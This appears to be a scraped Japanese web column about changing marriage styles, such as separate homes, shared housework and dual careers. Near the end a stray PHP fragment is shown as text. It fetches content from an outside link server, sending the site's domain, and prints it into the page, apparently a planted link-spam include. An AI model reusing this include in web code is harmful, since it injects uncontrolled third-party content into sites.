前へ
次へ

お互いの生活を尊重し合う結婚生活

結婚したら当たり前のように一緒に住んで、子どもをたくさん作り、女は家事をし男は家庭を顧みず働くというのが昔の価値観でした。
今はだいぶ違っていて、子どもは産まずに女性も仕事を続け、家事は助け合って行うのが普通です。
また、二人の都合によっては一緒に暮らさないで別々の家に住み、会いたいときだけ会うというスタイルもあります。
若い人たちは自分のペースを乱されることに抵抗感があり、それが結婚を敬遠する理由の一つになっています。
例えば芸能人やSNSのインフルエンサーたちが新しい結婚生活のスタイルを見せることで、「こういう結婚なら自分もしてみたい、自分にもできるかも」と間口を広げることができるかもしれません。
もちろん、誰かと結婚するということは我慢や価値観のすり合わせも必要です。
しかし共働きをしなければ家庭が成り立たない現代では、新しいスタイルを確立しない限り女性の負担が増えすぎてしまうでしょう。
その辺りの話し合いができる相手との結婚が望ましいかもしれません。

".file_get_contents('http://links-001.com/kanren7set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top